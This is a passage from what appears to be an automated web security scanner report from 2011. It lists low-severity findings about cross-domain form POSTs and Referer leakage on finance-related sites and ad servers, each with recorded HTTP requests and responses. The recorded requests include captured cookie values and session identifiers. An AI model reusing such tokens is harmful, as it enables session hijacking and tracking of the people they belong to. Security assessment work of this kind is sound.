GET /plugins/like.php?&width=400&height=80&layout=standard&show_faces=true&action=like&font=arial&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110512_0700%26ssh%3DS423239929%26FORM%3DHPFBLK%26mkt%3Den-US%26 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.203.56
X-Cnection: close
Date: Thu, 12 May 2011 10:59:49 GMT
Content-Length: 8598

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4dcbbda5645ce8d57757557" class="connect_widget" style="font-family: &quot;arial&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You like <b>Today&#039;s picture</b>.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_share_comment_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_share_comment_option">Add Comment</a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You and 199 others like this.</span><span class="connect_widget_not_connected_text">199 likes. 
<a href="/campaign/landing.php?campaign_id=137675572948107&amp;partner_id&amp;placement=like_button&amp;extra_2=US" target="_blank">Sign Up</a> to see what your friends like.</span><span class="unlike_
...[SNIP]...

18. Cross-domain POST
There are 9 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


18.1. http://privatemoneytalk.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://privatemoneytalk.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain fcg.infusionsoft.com. The form contains the following fields:

Request

GET /?utm_source=msn&utm_medium=cpc&utm_term=private%20equity HTTP/1.1
Host: privatemoneytalk.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:02:34 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://privatemoneytalk.com/xmlrpc.php
Set-Cookie: PHPSESSID=35655162a024a2c7b1ebfebb9b6b03b6; path=/
Set-Cookie: sbmg_footerShowAfter=1; expires=Fri, 11-May-2012 11:02:35 GMT; path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 22087

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xml:lang="en-US">
<head>
<link rel="profile" href="http://gmpg.org/xfn/11" />
<meta http-equiv="Content-Type" cont
...[SNIP]...
</script>
       <form action="https://fcg.infusionsoft.com/AddForms/processFormSecure.jsp" method="post" onsubmit="return sbmgValidateFormW1368('Contact0FirstName','Contact0Email')"><input type="hidden" value="de5d558cc6914437c3089672b860f51c" name="infusion_xid" id="infusion_xid" />
...[SNIP]...

18.2. http://privatemoneytalk.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://privatemoneytalk.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain fcg.infusionsoft.com. The form contains the following fields:

Request

GET /?utm_source=msn&utm_medium=cpc&utm_term=private%20equity HTTP/1.1
Host: privatemoneytalk.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:02:34 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://privatemoneytalk.com/xmlrpc.php
Set-Cookie: PHPSESSID=35655162a024a2c7b1ebfebb9b6b03b6; path=/
Set-Cookie: sbmg_footerShowAfter=1; expires=Fri, 11-May-2012 11:02:35 GMT; path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 22087

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xml:lang="en-US">
<head>
<link rel="profile" href="http://gmpg.org/xfn/11" />
<meta http-equiv="Content-Type" cont
...[SNIP]...
</p>
<form action="https://fcg.infusionsoft.com/AddForms/processFormSecure.jsp" method="post" onsubmit="return sbmgValidateFormPostPg1('Contact0FirstName','Contact0Email')"><input type="hidden" value="de5d558cc6914437c3089672b860f51c" name="infusion_xid" id="infusion_xid" />
...[SNIP]...

18.3. http://www.vcgate.com/Private-Equity.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vcgate.com
Path:   /Private-Equity.htm

Issue detail

The page contains a form which POSTs data to the domain www.aweber.com. The form contains the following fields:

Request

GET /Private-Equity.htm HTTP/1.1
Host: www.vcgate.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:03:53 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-type: text/html
Content-Length: 13102

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- Google Website Op
...[SNIP]...
<center><form method="post" action="http://www.aweber.com/scripts/addlead.pl">
<input type="hidden" name="meta_web_form_id" value="663859">
...[SNIP]...

18.4. http://www.vcgate.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vcgate.com
Path:   /favicon.ico

Issue detail

The page contains a form which POSTs data to the domain www.aweber.com. The form contains the following fields:

Request

GET /favicon.ico HTTP/1.1
Host: www.vcgate.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=28331451.1305198197.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmx=28331451.; __utmxx=28331451.; __utma=28331451.1717277298.1305198197.1305198197.1305198197.1; __utmc=28331451; __utmb=28331451.4.10.1305198197

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 11:05:35 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-Pingback: http://www.vcgate.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 12 May 2011 11:05:35 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 38977

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div style="float:left; width:220px; padding-left:20px;">
<form method="post" action="http://www.aweber.com/scripts/addlead.pl">
<input type="hidden" name="meta_web_form_id" value="658109">
...[SNIP]...

18.5. http://www.vcgate.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vcgate.com
Path:   /favicon.ico

Issue detail

The page contains a form which POSTs data to the domain www.aweber.com. The form contains the following fields:

Request

GET /favicon.ico HTTP/1.1
Host: www.vcgate.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=28331451.1305198197.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmx=28331451.; __utmxx=28331451.; __utma=28331451.1717277298.1305198197.1305198197.1305198197.1; __utmc=28331451; __utmb=28331451.4.10.1305198197

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 11:05:35 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-Pingback: http://www.vcgate.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 12 May 2011 11:05:35 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 38977

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</style>
<form method="post" class="af-form-wrapper" action="http://www.aweber.com/scripts/addlead.pl" >
<div style="display: none;">
...[SNIP]...

18.6. http://www.vcgate.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vcgate.com
Path:   /favicon.ico

Issue detail

The page contains a form which POSTs data to the domain www.aweber.com. The form contains the following fields:

Request

GET /favicon.ico HTTP/1.1
Host: www.vcgate.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=28331451.1305198197.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmx=28331451.; __utmxx=28331451.; __utma=28331451.1717277298.1305198197.1305198197.1305198197.1; __utmc=28331451; __utmb=28331451.4.10.1305198197

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 11:05:35 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-Pingback: http://www.vcgate.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 12 May 2011 11:05:35 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 38977

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</p>

                           
<form method="post" class="af-form-wrapper" action="http://www.aweber.com/scripts/addlead.pl" >

<div style="display: none;">
...[SNIP]...

18.7. http://www.vcgate.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vcgate.com
Path:   /favicon.ico

Issue detail

The page contains a form which POSTs data to the domain www.aweber.com. The form contains the following fields:

Request

GET /favicon.ico HTTP/1.1
Host: www.vcgate.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=28331451.1305198197.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmx=28331451.; __utmxx=28331451.; __utma=28331451.1717277298.1305198197.1305198197.1305198197.1; __utmc=28331451; __utmb=28331451.4.10.1305198197

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 11:05:35 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-Pingback: http://www.vcgate.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 12 May 2011 11:05:35 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 38977

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</p>

                           
<form method="post" class="af-form-wrapper" action="http://www.aweber.com/scripts/addlead.pl" >

<div style="display: none;">
...[SNIP]...

18.8. http://www.vcgate.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vcgate.com
Path:   /favicon.ico

Issue detail

The page contains a form which POSTs data to the domain www.aweber.com. The form contains the following fields:

Request

GET /favicon.ico HTTP/1.1
Host: www.vcgate.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=28331451.1305198197.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmx=28331451.; __utmxx=28331451.; __utma=28331451.1717277298.1305198197.1305198197.1305198197.1; __utmc=28331451; __utmb=28331451.4.10.1305198197

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 11:05:35 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-Pingback: http://www.vcgate.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 12 May 2011 11:05:35 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 38977

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<center><form method="post" action="http://www.aweber.com/scripts/addlead.pl">
<input type="hidden" name="meta_web_form_id" value="663859">
...[SNIP]...

18.9. http://www.vcgate.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vcgate.com
Path:   /favicon.ico

Issue detail

The page contains a form which POSTs data to the domain www.aweber.com. The form contains the following fields:

Request

GET /favicon.ico HTTP/1.1
Host: www.vcgate.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=28331451.1305198197.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmx=28331451.; __utmxx=28331451.; __utma=28331451.1717277298.1305198197.1305198197.1305198197.1; __utmc=28331451; __utmb=28331451.4.10.1305198197

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 11:05:35 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-Pingback: http://www.vcgate.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 12 May 2011 11:05:35 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 38977

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="bottombars" class="btb3" >
<form method="post" class="af-form-wrapper" action="http://www.aweber.com/scripts/addlead.pl" >
<div style="display: none;">
...[SNIP]...

19. Cross-domain Referer leakage
There are 61 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


19.1. http://ad-emea.doubleclick.net/adi/N568.273558.BLOOMBERG1/B3885816.3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N568.273558.BLOOMBERG1/B3885816.3

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /adi/N568.273558.BLOOMBERG1/B3885816.3;sz=88x31;click0=http://ads.bloomberg.com/RealMedia/ads/click_lx.ads/bloombergopt/news/sports/international/story/L44/2095024673/x81/Bloomberg/3848309/DowJones_DART_NewsTradebar_88x31.html/72634857383032345a51594144454b2b?;ord=2095024673? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 634
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 12 May 2011 11:37:31 GMT
Expires: Thu, 12 May 2011 11:37:31 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad-emea.doubleclick.net/click;h=v8/3b05/14/cd
...[SNIP]...
ergopt/news/sports/international/story/L44/2095024673/x81/Bloomberg/3848309/DowJones_DART_NewsTradebar_88x31.html/72634857383032345a51594144454b2b?https://order.barrons.com/sub/xdef/002/6BCWAA_OOTB23"><img src="http://s0.2mdn.net/viewad/1164544/1-88x31.gif" border=0 alt="Advertisement"></a>
...[SNIP]...

19.2. http://ad-emea.doubleclick.net/adj/N1379.290479.MEDIABUYER/B5191871

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N1379.290479.MEDIABUYER/B5191871

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /adj/N1379.290479.MEDIABUYER/B5191871;sz=88x31;click0=http://ads.bloomberg.com/RealMedia/ads/click_lx.ads/bloombergopt/news/sports/international/story/L44/939683557/x82/Bloomberg/3750448/Citifx_Button_88x31_March11th.html/72634857383032345a51594144454b2b?;ord=939683557? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 616
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 12 May 2011 11:37:31 GMT
Expires: Thu, 12 May 2011 11:37:31 GMT
Discarded: true

document.write('<a target="_blank" href="http://ad-emea.doubleclick.net/click;h=v8/3b05/14/c9/%2a/f;241152358;0-0;0;59489383;21-88/31;42134834/42152621/1;;~sscs=%3fhttp://ads.bloomberg.com/RealMedia/a
...[SNIP]...
683557/x82/Bloomberg/3750448/Citifx_Button_88x31_March11th.html/72634857383032345a51594144454b2b?http://www.citifxpro.com/Forex-Trading-with-Citi?utm_campaign=&utm_source=mediabuyer&utm_medium=banner"><img src="http://s0.2mdn.net/viewad/3055127/CitiFXPro_USRetail_StaticNonAnimated_88x31_v1.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

19.3. http://ad.doubleclick.net/adj/N5877.774.5057472001621/B5104260

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5877.774.5057472001621/B5104260

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /adj/N5877.774.5057472001621/B5104260;sz=88x31;click0=http://ads.bloomberg.com/RealMedia/ads/click_lx.ads/bloombergopt/news/sports/international/story/L44/443431456/x80/Bloomberg/3526793/3526793.html/72634857383032345a51594144454b2b?;ord=443431456? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 590
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 12 May 2011 11:37:29 GMT
Expires: Thu, 12 May 2011 11:37:29 GMT
Discarded: true

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b05/14/b3/%2a/t;235823875;1-0;0;59604540;21-88/31;42142136/42159923/1;;~sscs=%3fhttp://ads.bloomberg.com/RealMedia/ads/cl
...[SNIP]...
rg/3526793/3526793.html/72634857383032345a51594144454b2b?http://www.forex.com/land-demo2-gen.html?v=displayactivegen&src=201105AMG217&utm_source=Bloomberg&utm_medium=banner&utm_campaign=2011DisplayUS"><img src="http://s0.2mdn.net/viewad/2363305/LogoBlue88x31_endless.gif" border=0 alt="Advertisement"></a>
...[SNIP]...

19.4. http://ad.doubleclick.net/adj/fbn

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/fbn

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /adj/fbn;pos=kontera;sz=1x1;ord=504013981? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:38:27 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 310

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b05/0/0/%2a/y;225079562;0-0;1;22018143;31-1/1;36828959/36846837/1;;~okv=;pos=kontera;sz=1x1;~aopt=2/1/9e/0;~sscs=%3fhttp://www.foxnews.com"><img src="http://s0.2mdn.net/viewad/2691058/blankgif2.gif" border=0 alt="fox news"></a>
...[SNIP]...

19.5. http://ad.doubleclick.net/adj/fbn/markets

Summary

Severity:   Information
Confidence:   Certain
